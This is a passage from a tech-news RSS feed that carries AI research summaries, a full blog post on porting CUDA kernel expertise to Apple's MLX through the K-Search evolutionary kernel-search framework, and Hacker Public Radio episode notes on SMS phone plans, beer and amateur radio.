<link>https://tsecurity.de/de/3699741/ai-nachrichten/memory-efficient-audio-synthesis-with-decoupled-temporal-depth-diffusion-transformers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699741/ai-nachrichten/memory-efficient-audio-synthesis-with-decoupled-temporal-depth-diffusion-transformers/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:39 +0200</pubDate>
<content:encoded><![CDATA[Siri Expressive Voices synthesize rich, configurable speech in real time and entirely on device, powered by AFM 3 Core Advanced, Apple’s most powerful on-device foundation model. This work presents the memory-efficient audio synthesis architecture behind that capability: a detokenizer that converts the semantic audio tokens emitted by the foundation model into high-fidelity audio within the tight compute and memory budget of the Apple Matrix Coprocessor (AMX). We convert semantic audio tokens to a residual vector quantization (RVQ) representation with a three-component design—a streaming…]]></content:encoded>
</item>
<item>
<title><![CDATA[GH-ESD: Grounded Hypothesis-Driven Error Slice Discovery for Instance-Level Vision Tasks]]></title>
<description><![CDATA[Systematic failures of vision models on semantically coherent subsets, known as error slices, reveal limitations in robustness and evaluation. Existing slice discovery approaches largely model slices as clusters in representation space or combinations of predefined attributes. While effective for...]]></description>
<link>https://tsecurity.de/de/3699742/ai-nachrichten/gh-esd-grounded-hypothesis-driven-error-slice-discovery-for-instance-level-vision-tasks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699742/ai-nachrichten/gh-esd-grounded-hypothesis-driven-error-slice-discovery-for-instance-level-vision-tasks/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:39 +0200</pubDate>
<content:encoded><![CDATA[Systematic failures of vision models on semantically coherent subsets, known as error slices, reveal limitations in robustness and evaluation. Existing slice discovery approaches largely model slices as clusters in representation space or combinations of predefined attributes. While effective for image-level classification, such formulations are insufficient for instance-level tasks such as object detection and segmentation, where failures often arise from contextual relational and spatially grounded visual patterns. We propose GH-ESD (Grounded Hypothesis-Driven Error Slice Discovery), a…]]></content:encoded>
</item>
<item>
<title><![CDATA[Teaching Coding When AI Can Write the Code]]></title>
<description><![CDATA[For as long as we’ve taught programming, the student’s code has provided a window into the students’ thinking. Errors, the code structure, the awkward working solution—all of it showed how someone reasoned and where they got stuck. It was never a clean window. Students have always copied, crammed...]]></description>
<link>https://tsecurity.de/de/3699746/ai-nachrichten/teaching-coding-when-ai-can-write-the-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699746/ai-nachrichten/teaching-coding-when-ai-can-write-the-code/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:39 +0200</pubDate>
<content:encoded><![CDATA[For as long as we’ve taught programming, the student’s code has provided a window into the students’ thinking. Errors, the code structure, the awkward working solution—all of it showed how someone reasoned and where they got stuck. It was never a clean window. Students have always copied, crammed, and borrowed, sometimes turning in work they […]]]></content:encoded>
</item>
<item>
<title><![CDATA[The 3× Token Bill We Didn’t See Coming]]></title>
<description><![CDATA[How a seemingly harmless move to a multi-agent architecture quietly tripled our LLM costs and what actually fixed it.
The post The 3× Token Bill We Didn’t See Coming appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3699707/ai-nachrichten/the-3-token-bill-we-didnt-see-coming/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699707/ai-nachrichten/the-3-token-bill-we-didnt-see-coming/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:38 +0200</pubDate>
<content:encoded><![CDATA[<p>How a seemingly harmless move to a multi-agent architecture quietly tripled our LLM costs and what actually fixed it.</p>
<p>The post <a href="https://towardsdatascience.com/the-3x-token-bill-we-didnt-see-coming/">The 3× Token Bill We Didn’t See Coming</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Avoiding Entity Key Drift in a Data Lake: Step 1, Normalization]]></title>
<description><![CDATA[This is the opening piece of a four-part deep dive series, on building a high-frequency streaming pipeline against a live public API. The data source is openSenseMap, a citizen-science IoT network used for climate research, mostly in Germany. A live public API is what makes it useful: it produces...]]></description>
<link>https://tsecurity.de/de/3699719/ai-nachrichten/avoiding-entity-key-drift-in-a-data-lake-step-1-normalization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699719/ai-nachrichten/avoiding-entity-key-drift-in-a-data-lake-step-1-normalization/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:38 +0200</pubDate>
<content:encoded><![CDATA[<p>This is the opening piece of a four-part deep dive series, on building a high-frequency streaming pipeline against a live public API. The data source is openSenseMap, a citizen-science IoT network used for climate research, mostly in Germany. A live public API is what makes it useful: it produces data-quality problems and edge cases that clean sample datasets never show. This article focuses on step-1: Normalization, later pieces cover matching algorithms, adaptive polling and noise filtering, and a vendor-agnostic Apache Iceberg pipeline with Terraform that runs locally in Docker and moves to AWS or GCP with minimal change.</p>
<p>The post <a href="https://towardsdatascience.com/avoiding-entity-key-drift-in-a-data-lake-step-1-normalization/">Avoiding Entity Key Drift in a Data Lake: Step 1, Normalization</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From CUDA to MLX: How K-Search Brings Decades of Kernel Expertise to Apple Silicon]]></title>
<description><![CDATA[Figure 1: CUDA-to-MLX optimization translation map. CUDA optimization knowledge can be translated into architecture-native MLX strategies rather than copied instruction-for-instruction.

We face a new epoch in computing. Hardware is changing rapidly — not just faster GPUs, but a growing range of ...]]></description>
<link>https://tsecurity.de/de/3699701/ai-nachrichten/from-cuda-to-mlx-how-k-search-brings-decades-of-kernel-expertise-to-apple-silicon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699701/ai-nachrichten/from-cuda-to-mlx-how-k-search-brings-decades-of-kernel-expertise-to-apple-silicon/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:37 +0200</pubDate>
<content:encoded><![CDATA[<!-- twitter -->












<p class="center">
<img src="https://bair.berkeley.edu/static/blog/cuda-to-mlx-k-search/cover.svg" alt="Kernel knowledge transfer from CUDA to MLX"><br>
</p>

<p class="cuda-mlx-fig-caption"><strong>Figure 1: CUDA-to-MLX optimization translation map.</strong> CUDA optimization knowledge can be translated into architecture-native MLX strategies rather than copied instruction-for-instruction.</p>

<p>We face a new epoch in computing. Hardware is changing rapidly — not just faster GPUs, but a growing range of chips from different vendors, each with its own architecture and often tailored to specific AI workloads. Software is changing just as fast, and AI coding tools now generate in minutes what took months of effort a few years ago.</p>

<!--more-->

<p>With so much of computing now centered on AI, GPU kernels are a crucial component of its success. These are the low-level programs that run inside the GPU, and writing efficient ones is far from obvious — it takes years of expertise to get right. Transferring a kernel from one vendor’s hardware to another is harder still, and often means rediscovering the same optimizations from scratch. The CUDA ecosystem, for example, has accumulated decades of hard-won kernel expertise: hand-tuned implementations of attention, state space models, and other critical operations representing thousands of engineering hours. Newer hardware ecosystems (Apple Silicon, custom AI accelerators, and others) are growing fast but lack this depth.</p>

<p>In this work we ask whether that expertise can be transferred automatically. We built on <a href="https://arxiv.org/abs/2602.19128">K-Search</a>, an evolutionary kernel search framework introduced by Cao et al. at Berkeley Sky Lab that uses AI to optimize GPU kernels, and extended it with a backend for MLX — Apple’s machine-learning framework for its own Apple Silicon chips. We developed a novel structured CUDA-to-MLX translation layer that lets K-Search take existing CUDA kernels as a knowledge base and adapt them into high-quality GPU kernels for Apple Silicon, rather than rebuilding from scratch.</p>

<p>We show that our approach reaches near-expert level performance on Apple Silicon with 0.97x speedup compared to the native MLX Attention kernel, and up to a 20x prefill speedup over the community mlx-lm implementation on the Mamba SSM kernel; we report the numbers, and how much of the gain comes from the translation layer, in the sections below. Although we focus on MLX kernels for Apple Silicon, the method is not specific to MLX and applies to any ecosystem where CUDA expertise is transferable.</p>

<h2>Why MLX?</h2>

<p>Apple’s MLX framework has seen remarkable adoption since late 2023. With Apple Silicon in hundreds of millions of MacBooks and Mac Studios, MLX enables local AI inference without cloud costs. The unified memory architecture makes it especially attractive for mid-sized models (7B–70B parameters on M series chips).</p>

<p>Yet beneath this momentum lies a significant gap: many performance-critical kernels that the NVIDIA ecosystem takes for granted: paged attention, optimized SSM scan kernels, fused MoE routing are either absent or naive without hardware-specific tuning. MLX runs models correctly but often leaves significant performance on the table.</p>

<p>This gap is what motivates the rest of this post.</p>

<h2>What is K-Search?</h2>

<p>K-Search is an evolutionary kernel optimization framework originally developed by our first author Shiyi Cao at UC Berkeley Sky Lab. Given a naive kernel and a hardware specification, it runs an iterative optimization loop: an LLM reasons about which optimizations to try next, a code-writing model generates candidate kernels, and those candidates are compiled and benchmarked on real hardware.</p>

<p>Measurements feed back into the search, which keeps refining, pursuing promising directions and dropping dead ends until performance converges.</p>

<p class="center">
<img src="https://bair.berkeley.edu/static/blog/cuda-to-mlx-k-search/algorithm-01-k-search.svg" alt="Pseudocode for K-Search via co-evolving world models" width="460"><br>
</p>

<p class="cuda-mlx-fig-caption"><strong>Algorithm 1: K-Search via co-evolving world models.</strong> The search alternates between selecting the most promising action, instantiating and evaluating code until improvement stagnates, and evolving the world model through insert, update, and prune operations. Adapted from <a href="https://arxiv.org/abs/2602.19128">Cao et al. (2026)</a>.</p>

<p>Search is grounded by a Spec: a domain-specific document encoding hardware rules, optimization patterns, and mathematical constraints which keeps generated code from hallucinating invalid primitives and ensures candidates will actually compile and run efficiently.</p>

<p>In our runs, a single model (Gemini 3.5 Pro Preview) plays both roles: it maintains the reasoning state and writes the kernels. The reasoning half is prompted as a “GPU kernel performance engineer” and asked to work through a fixed analysis before proposing anything: classify the kernel (reduction, scan, attention/softmax, …), rewrite the reference computation in canonical form, map out data layout and access patterns, and hypothesize the likely bottleneck (bandwidth, latency, compute, or synchronization) in each runtime regime. Only then does it emit candidate optimizations, each as a single change implementable in one iteration.</p>

<p>We call the persistent reasoning state a <em>world model</em>. Rather than a flat list of things to try, it is a decision (prefix) tree: each root→leaf path composes a full optimization plan, and sibling branches are competing alternatives. Every node is scored — an <code class="language-plaintext highlighter-rouge">overall_rating</code> in [0, 10], a <code class="language-plaintext highlighter-rouge">confidence</code> in [0, 1], and per-node <code class="language-plaintext highlighter-rouge">impacts</code> on memory bandwidth, register pressure, and compute/hardware fit — so the search can rank partial plans and expand the most promising ones. The tree persists and grows across rounds: refining an idea adds a child node rather than overwriting its parent, and if the best score fails to improve for a few rounds (a stagnation window) the search backs off to explore an alternative branch. A single node, as it appears mid-run on the attention kernel, looks like this:</p>

<div class="post-code-compact">

  <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Replace the threadgroup-memory softmax reduction
             with a register-only reduction: each SIMD group
             owns 8 query rows and reduces across lanes with
             simd_shuffle_xor, removing a threadgroup_barrier."</span><span class="p">,</span><span class="w">
  </span><span class="nl">"difficulty_1_to_5"</span><span class="p">:</span><span class="w"> </span><span class="mi">4</span><span class="p">,</span><span class="w">
  </span><span class="nl">"impacts"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"memory_bandwidth"</span><span class="p">:</span><span class="w">  </span><span class="mi">8</span><span class="p">,</span><span class="w">
    </span><span class="nl">"register_pressure"</span><span class="p">:</span><span class="w"> </span><span class="mi">4</span><span class="p">,</span><span class="w">   </span><span class="err">//</span><span class="w"> </span><span class="err">risk:</span><span class="w"> </span><span class="err">spill</span><span class="w"> </span><span class="err">if</span><span class="w"> </span><span class="err">Br</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="mi">8</span><span class="w">
    </span><span class="nl">"compute_hw_fit"</span><span class="p">:</span><span class="w">    </span><span class="mi">9</span><span class="w">    </span><span class="err">//</span><span class="w"> </span><span class="err">SIMD</span><span class="w"> </span><span class="err">width</span><span class="w"> </span><span class="mi">32</span><span class="err">;</span><span class="w"> </span><span class="err">keep</span><span class="w"> </span><span class="err">tile</span><span class="w"> </span><span class="mi">8</span><span class="err">x</span><span class="mi">8</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"overall_rating_0_to_10"</span><span class="p">:</span><span class="w"> </span><span class="mi">8</span><span class="p">,</span><span class="w">
  </span><span class="nl">"confidence_0_to_1"</span><span class="p">:</span><span class="w"> </span><span class="mf">0.7</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div>  </div>

</div>

<p class="cuda-mlx-fig-caption"><strong>Listing 1: Example K-Search world-model node.</strong> Each candidate optimization records a concrete action, estimated hardware impacts, an overall priority rating, and the model's confidence.</p>

<p class="center">
<img src="https://bair.berkeley.edu/static/blog/cuda-to-mlx-k-search/best-figure-01-ksearch-loop.svg" alt="Overview of the K-Search loop" width="700"><br>
</p>

<p class="cuda-mlx-fig-caption"><strong>Figure 2: Overview of K-Search.</strong> The framework operates on a <strong>Search State</strong> $S_t$ structured as a search tree. The tree consists of Closed nodes (blue, visited states with attached program like $x_{12}$) and a Frontier of Open nodes (orange, pending hypotheses like $u_{13}$). The workflow iterates through three phases: (1) <strong>Action Selection</strong>, where the most promising action node is retrieved from the frontier based on world model estimated priority score $V$; (2) <strong>Local Refinement</strong>, where a stochastic policy $\pi_{\mathrm{code}}$ samples concrete implementations until stagnation; and (3) <strong>World Model Update</strong>, where the LLM reasons over the trajectory to update the search tree via <em>Insert</em> (adding new actions), <em>Update</em> (adjusting $V$, e.g., $u_{11}$ dropping from 0.9 to 0.6), and <em>Prune</em> (removing less promising nodes like $u_{10}$).</p>

<p>The original K-Search paper evaluated this search strategy on CUDA kernels from FlashInfer. Across GQA decode, MLA decode, MLA prefill, and MoE, K-Search improved more consistently than OpenEvolve and ShinkaEvolve over the same 120-iteration budget. These results establish the search framework we build on here; the remainder of this post asks whether its optimization knowledge can transfer beyond CUDA.</p>

<p class="center">
<img src="https://bair.berkeley.edu/static/blog/cuda-to-mlx-k-search/best-figure-03-ksearch-main-results.svg" alt="K-Search benchmark results compared with OpenEvolve and ShinkaEvolve" width="900"><br>
</p>

<p class="cuda-mlx-fig-caption"><strong>Figure 3: Main results from the original K-Search paper.</strong> Across three runs, K-Search achieves stronger best-so-far search scores, per-workload kernel performance, and speedup distributions than OpenEvolve and ShinkaEvolve on four FlashInfer CUDA kernels. Reproduced exactly from <a href="https://arxiv.org/abs/2602.19128">Cao et al. (2026)</a>.</p>

<h2>Building an MLX backend</h2>

<p>To bring K-Search to Apple Silicon, we first built a native MLX backend. We implemented a full MLX-specific task adapter for K-Search, including:</p>

<ul>
  <li>An MLX task backend in <code class="language-plaintext highlighter-rouge">k_search/tasks/</code> handling kernel compilation and execution on Apple Silicon via MLX’s Metal/C++ APIs.</li>
  <li>Updated kernel generator prompts for writing and modifying Metal/MLX kernels.</li>
  <li>MLX-specific benchmarking integration using <code class="language-plaintext highlighter-rouge">mlx.core</code> measurement utilities.</li>
</ul>

<h2>Translating CUDA expertise to MLX</h2>

<p>However, the more interesting challenge was not simply running K-Search on MLX. The key insight is that expert CUDA kernels encode decades of optimization knowledge that is transferable to Apple GPU if you can bridge the conceptual gap. Simply handing an LLM a CUDA kernel and asking it to port it is not enough: without deep hardware context, it produces code that is syntactically valid but architecturally wrong (wrong tile sizes, invalid primitives, mismatched memory assumptions).</p>

<p>Our translation layer consists of:</p>

<ul>
  <li><strong>Concept mapping tables:</strong> A structured glossary of CUDA primitives and their MLX/Metal equivalents with hard constraints. For example:
    <ul>
      <li><code class="language-plaintext highlighter-rouge">__shared__</code> maps to Metal <code class="language-plaintext highlighter-rouge">threadgroup</code> memory but with a hard 32 KB limit (vs. NVIDIA’s 48 KB)</li>
      <li><code class="language-plaintext highlighter-rouge">warp_reduce</code> maps to MMA (preferred)</li>
      <li><code class="language-plaintext highlighter-rouge">__syncthreads()</code> becomes <code class="language-plaintext highlighter-rouge">threadgroup_barrier(mem_flags::mem_tg)</code></li>
      <li>H100’s ~3.35 TB/s HBM3 maps to M3 Max’s ~400 GB/s unified DRAM a bandwidth difference that reshapes which optimizations are worth pursuing.</li>
    </ul>
  </li>
  <li><strong>MLX-specific hints and patterns:</strong> Concrete code-level patterns for operations with no direct CUDA equivalent, such as register-based row reductions using <code class="language-plaintext highlighter-rouge">simd_shuffle_xor</code> in an 8×8 MMA tile layout, or the “exp2 trick” (replacing $exp(x)$ with $exp_2(x \log_2 e)$) for faster softmax on Apple’s fast $exp_2$ hardware instruction.</li>
  <li><strong>Reusable assertions:</strong> Expert kernel behaviors reframed as properties the evolutionary search must preserve, rather than code to copy.</li>
</ul>

<h2>Matching expert kernel performance: the Attention kernel</h2>

<p>We evaluate three configurations of an MLX attention kernel for Apple Silicon: (1) a naive baseline, (2) pure evolution with no additional provided context, and (3) a full context translation layer, which supplies the optimizer with architecture-specific implementation knowledge extracted from high-performance kernels (e.g., FlashAttention-2), letting the evolutionary search reason about implementation strategies rather than starting from a naive kernel. Together, these three configurations let us isolate the exact impact of the translation layer.</p>

<p class="center">
<img src="https://bair.berkeley.edu/static/blog/cuda-to-mlx-k-search/best-figure-02-attention-optimizations.svg" alt="Performance scaling of the Attention Kernel through stacked optimizations" width="700"><br>
</p>

<p class="cuda-mlx-fig-caption"><strong>Figure 4:</strong> Performance scaling of the Attention Kernel through stacked optimizations. The "Full Context" configuration successfully discovers and implements advanced strategies like double buffering and loop unrolling, achieving near-expert performance.</p>

<p>The jump from 0.26× to 0.97× the speed of Apple’s state-of-the-art attention kernel — illustrates how much the translation layer matters. With full context, the evolved kernel independently discovers the key optimizations in FlashAttention 2: threadgroup memory tiling, online softmax, K-transposition for memory access, and the exp2 trick. The last of these replaces every softmax exponential with a base-2 exponential,</p>

\[e^x = 2^{x \log_2 e},\]

<p>which is exact and lets the kernel use Apple’s fast <code class="language-plaintext highlighter-rouge">fast::exp2()</code> hardware instruction directly instead of paying for a base conversion at runtime.</p>

<h2>A 20× faster prefill: the Mamba SSM kernel</h2>

<p>To evaluate whether K-Search generalizes beyond attention kernels, we applied it to the state-space model (SSM) kernel used by Mamba. Unlike attention, the computational bottleneck is a recurrent state update rather than a softmax, providing a substantially different optimization challenge. We compare the evolved implementation against the community MLX implementation (mlx-lm) and the PyTorch reference implementation (mamba.py) on an M1 Max.</p>

<p>Evaluated on mamba-370m f16, M1 Max 64GB:</p>

<div class="cuda-mlx-results-table">

  <table>
    <thead>
      <tr>
        <th>Metric</th>
        <th>mlx-mamba (ours)</th>
        <th>mlx-lm (community)</th>
        <th>mamba.py</th>
      </tr>
    </thead>
    <tbody>
      <tr>
        <td>Decode</td>
        <td>152 tok/s</td>
        <td>116 tok/s</td>
        <td>40 tok/s</td>
      </tr>
      <tr>
        <td>Prefill L=512</td>
        <td>5,751 tok/s</td>
        <td>329 tok/s</td>
        <td>1,089 tok/s</td>
      </tr>
      <tr>
        <td>Prefill L=1024</td>
        <td>6,010 tok/s</td>
        <td>327 tok/s</td>
        <td>1,127 tok/s</td>
      </tr>
      <tr>
        <td>Prefill L=2048</td>
        <td>6,612 tok/s</td>
        <td>326 tok/s</td>
        <td>1,092 tok/s</td>
      </tr>
      <tr>
        <td>Prefill L=4096</td>
        <td>6,743 tok/s</td>
        <td>339 tok/s</td>
        <td>1,042 tok/s</td>
      </tr>
    </tbody>
  </table>

</div>

<p class="cuda-mlx-fig-caption"><strong>Table 1:</strong> Prefill and decode throughput on mamba-370m (f16, M1 Max 64GB). mlx-mamba (ours) reaches ~20× higher prefill throughput than the community mlx-lm baseline, while decode remains comparable.</p>

<p>The ~20× prefill speedup over mlx-lm comes down to one difference: mlx-lm does not implement a parallel scan for the SSM. The state recurrence</p>

\[h_t = \bar{a}_t h_{t-1} + \bar{b}_t\]

<p>looks inherently sequential, but each step can be written as a pair $(\bar{a}_t, \bar{b}_t)$ under the associative combine</p>

\[(a_2, b_2) \circ (a_1, b_1) = \left(a_2 a_1,\ a_2 b_1 + b_2\right),\]

<p>which reproduces the recurrence exactly. Because the operator is associative, the whole sequence can be evaluated with a parallel (prefix) scan in $O(\log N)$ dependent steps instead of $O(N)$. mlx-lm skips this and processes tokens one at a time, leaving most of Apple Silicon’s compute idle; our evolved Metal kernel applies the scan and makes much fuller use of GPU throughput. The gain shows up in prefill, where the full sequence is available to scan in parallel, and not in single-token decode, where there is only one new token per step and no scan to parallelize — which is why the decode row is roughly flat while prefill is ~20×.</p>

<p>mamba.py is slow on both prefill and decode because it is a PyTorch reference implementation that falls back to CPU or MPS on Apple Silicon, forgoing the hardware-specific optimizations that MLX’s Metal backend makes possible.</p>

<h2>What’s next?</h2>

<p>On the two kernels we studied, AI-driven evolutionary kernel search grounded in structured cross-platform translation knowledge reached near-expert performance on Apple Silicon without a team of GPU experts starting from scratch. We do not yet know how far this generalizes, but the result is encouraging.</p>

<p>For us the main takeaway is that the bottleneck was not the LLM’s ability to write Metal code, but the quality of the context and constraints we gave it. Our CUDA translation layer converts existing NVIDIA kernel expertise into actionable guidance for Apple Silicon, and lets K-Search’s evolutionary search do the rest.</p>

<p>We are actively extending this work in several directions: supporting new architectures, with current efforts focused on developing new kernels for the IBM Spyre AIU and broader hardware targets; adding more kernels such as paged attention and fused MoE routing; and improving integration with the K-Search evolution loop to make translation context even more automatic.</p>

<h2>Acknowledgements</h2>

<p>This work was carried out by IBM Research and builds on K-Search from the UC Berkeley Sky Lab (<a href="https://arxiv.org/abs/2602.19128">Cao et al., 2026</a>). We welcome collaboration and feedback from the MLX and broader AI systems communities. If you are working on kernel optimization for non-CUDA hardware, we would love to hear from you.</p>

<hr>

<h2>Citation</h2>

<div class="language-bibtex highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nc">@article</span><span class="p">{</span><span class="nl">cao2026k</span><span class="p">,</span>
  <span class="na">title</span><span class="p">=</span><span class="s">{K-Search: LLM Kernel Generation via Co-Evolving Intrinsic World Model}</span><span class="p">,</span>
  <span class="na">author</span><span class="p">=</span><span class="s">{Cao, Shiyi and Mao, Ziming and Gonzalez, Joseph E and Stoica, Ion}</span><span class="p">,</span>
  <span class="na">journal</span><span class="p">=</span><span class="s">{arXiv preprint arXiv:2602.19128}</span><span class="p">,</span>
  <span class="na">year</span><span class="p">=</span><span class="s">{2026}</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="post-appendix">

  <h2>Appendix: Try it yourself</h2>

  <p>The MLX backend is built on top of the open-source K-Search repo, so the results here can be reproduced directly. The steps are:</p>

  <p>1. Clone and install</p>

  <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/caoshiyi/K-Search.git
<span class="nb">cd </span>K-Search

uv pip <span class="nb">install </span>openai wandb
uv pip <span class="nb">install </span>git+https://github.com/caoshiyi/flashinfer-bench-ksearch.git
</code></pre></div>  </div>

  <p>2. Set your credentials</p>

  <p>Open the relevant script under scripts/ and set three variables at the top:</p>

  <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">KSEARCH_ROOT</span><span class="o">=</span>/path/to/K-Search
<span class="nv">API_KEY</span><span class="o">=</span>your-llm-api-key
</code></pre></div>  </div>

  <p>3. Run kernel search</p>

  <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Optimize Flash Attention on Apple Silicon (world-model mode)</span>
bash scripts/mac_flash_attention_wm.sh

<span class="c"># Or a Mamba SSM kernel, e.g. the selective scan</span>
bash scripts/mamba_selective_scan_fwd_wm.sh
</code></pre></div>  </div>

  <p>Full CLI reference and documentation are in the README.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Current State of Agentic AI]]></title>
<description><![CDATA[In this article, you will learn how agentic AI architecture has evolved by mid-2026, including the shift away from orchestrated reasoning loops, the rise of...]]></description>
<link>https://tsecurity.de/de/3699679/ai-nachrichten/the-current-state-of-agentic-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699679/ai-nachrichten/the-current-state-of-agentic-ai/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:35 +0200</pubDate>
<content:encoded><![CDATA[In this article, you will learn how agentic AI architecture has evolved by mid-2026, including the shift away from orchestrated reasoning loops, the rise of...]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4695: Try not to buy a phone]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


IDEAS:




 Using a cheap phone plan with SMS for authentication.


 Mighty Text as a free SMS solution.


 Google VoIP number for shared accounts.


 Issues with SMS verification blocking VoIP numbers.


 Avoiding carrier-specific number b...]]></description>
<link>https://tsecurity.de/de/3699671/podcasts/hpr4695-try-not-to-buy-a-phone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699671/podcasts/hpr4695-try-not-to-buy-a-phone/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:34 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
IDEAS:</p>

<ol>

<li>
 Using a cheap phone plan with SMS for authentication.</li>

<li>
 Mighty Text as a free SMS solution.</li>

<li>
 Google VoIP number for shared accounts.</li>

<li>
 Issues with SMS verification blocking VoIP numbers.</li>

<li>
 Avoiding carrier-specific number blocks.</li>

<li>
 Multiple SIM cards for cost-effective SMS.</li>

<li>
 Rooting a phone to manage apps.</li>

<li>
 Security concerns with third-party apps.</li>

<li>
 Limited data usage for minimal phone plans.</li>

<li>
 Challenges with app compatibility on rooted devices.</li>

<li>
 Short-term phone solutions for SMS needs.</li>

<li>
 Shared Google accounts for streamlined access.</li>

<li>
 Avoiding premium SMS services like $15/month plans.</li>

<li>
 Using Wi-Fi for data instead of cellular plans.</li>

<li>
 Importance of SMS for MFA (multi-factor authentication).</li>

<li>
 Transitioning from old phones to new setups.</li>

<li>
 Balancing convenience and cost in phone plans.</li>

<li>
 Reliance on SMS for banking and insurance access.</li>

<li>
 Difficulty finding non-blocked SMS verification options.</li>

<li>
 Preference for minimal, low-cost phone solutions.</li>

</ol>

<p>

</p>

<p>
RECOMMENDATIONS:</p>

<ol>

<li>
 Use a shared Google account for SMS access.</li>

<li>
 Opt for a cheap phone plan with unlimited texting.</li>

<li>
 Try Mighty Text as a free SMS alternative.</li>

<li>
 Avoid premium SMS services with high fees.</li>

<li>
 Use Wi-Fi instead of cellular data for minimal plans.</li>

<li>
 Choose carrier numbers over VoIP for critical services.</li>

<li>
 Root a device to manage app settings.</li>

<li>
 Test SMS compatibility with banks and providers.</li>

<li>
 Consider multiple SIM cards for redundancy.</li>

<li>
 Prioritize SMS for MFA over other verification methods.</li>

<li>
 Monitor app updates for compatibility with rooted devices.</li>

<li>
 Select phones with flexible data plans.</li>

<li>
 Use downloaded content instead of streaming.</li>

<li>
 Check for SMS blockages with new services.</li>

<li>
 Explore low-cost phone options for minimal use.</li>

<li>
 Maintain backup SMS methods for emergencies.</li>

<li>
 Simplify phone setups to reduce costs.</li>

<li>
 Verify SMS support before switching providers.</li>

<li>
 Combine Wi-Fi and SMS for reliable connectivity.</li>

<li>
 Share accounts to streamline digital access.</li>

</ol>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4695/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4694: HPR Beer Garden 16 - Belgian Blonde]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


Dave and Kevie are back with another HPR Beer Garden and this time they turn their attention to Belgian Blonde Ales. Kevie samples 
Leffe Blonde
, whilst Dave opts for 
La Chouffe
.


















Connect with the guys on Untappd:


...]]></description>
<link>https://tsecurity.de/de/3699672/podcasts/hpr4694-hpr-beer-garden-16-belgian-blonde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699672/podcasts/hpr4694-hpr-beer-garden-16-belgian-blonde/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:34 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
Dave and Kevie are back with another HPR Beer Garden and this time they turn their attention to Belgian Blonde Ales. Kevie samples <a href="https://www.leffe.com/beer?name=leffe-blonde" rel="noopener noreferrer" target="_blank">
Leffe Blonde</a>
, whilst Dave opts for <a href="https://chouffe.com/en-gb/our-beer/la-chouffe" rel="noopener noreferrer" target="_blank">
La Chouffe</a>
.</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4694/hpr4694_image_1.png">
<img src="https://hackerpublicradio.org/eps/hpr4694/hpr4694_image_1_tn.png">
</a>

</p>

<p>

</p>

<p>
Connect with the guys on Untappd:</p>

<p>

</p>

<ul>

<li>

<a href="https://untappd.com/user/thelovebug" rel="noopener noreferrer" target="_blank">
Dave</a>

</li>

<li>

<a href="https://untappd.com/user/kevie49" rel="noopener noreferrer" target="_blank">
Kevie</a>

</li>

</ul>

<p>

</p>

<p>
The intro sounds for the show are used from:</p>

<p>

</p>

<ul>

<li>

<a href="https://freesound.org/people/mixtus/sounds/329806/" rel="noopener noreferrer" target="_blank">
https://freesound.org/people/mixtus/sounds/329806/</a>

</li>

<li>

<a href="https://freesound.org/people/j1987/sounds/123003/" rel="noopener noreferrer" target="_blank">
https://freesound.org/people/j1987/sounds/123003/</a>

</li>

<li>

<a href="https://freesound.org/people/greatsoundstube/sounds/628437/" rel="noopener noreferrer" target="_blank">
https://freesound.org/people/greatsoundstube/sounds/628437/</a>

</li>

</ul>

<p>

</p>

<p>
The next 3 beer styles to be reviewed:</p>

<p>

</p>

<ul>

<li>
DDH IPA</li>

<li>
Amber Ale</li>

<li>
Lager</li>

</ul>

<p>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4694/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4693: Amateur Radio Field Days]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.



Hi, this is Archer72 for another episode of Hacker Public Radio.




